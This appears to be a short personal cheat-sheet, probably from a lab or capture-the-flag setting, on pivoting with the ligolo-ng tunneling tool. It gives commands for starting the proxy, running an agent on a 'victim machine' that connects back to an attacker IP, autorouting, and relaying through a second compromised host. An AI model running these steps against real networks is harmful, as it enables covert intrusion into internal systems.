https://github.com/nicocha30/ligolo-ng

Download the agent binary from the website

gzip -d <Path>

tar -xf <Path>

Once you extract

./proxy -selfcert → To start the tool

On Victim Machine

chmod +x agent ( For linux do this first )

./agent -connect 10.10.15.10:11601 -ignore-cert

Once the connection is made

session → To list all the session then select your session

help → To list all the commands

autoroute → The tool will do everything for u

  1. Select the interface u want to pivot
  2. Create new interface
  3. Create tunnel
  4. Now u can ping the internal IP from your attacker machine itself

Lets imagine you have one more machine to pivot into in that case

listener_add --addr 0.0.0.0:8000 --to 10.10.15.10:8000 --tcp → To transfer the agent on the victim machine from attacker machine

listener_add --addr 0.0.0.0:11601 --to 10.10.15.10:11601 --tcp → To add the pivoting

In this scenario use the subnet ip which makes the machine 2 and machine 3 in same network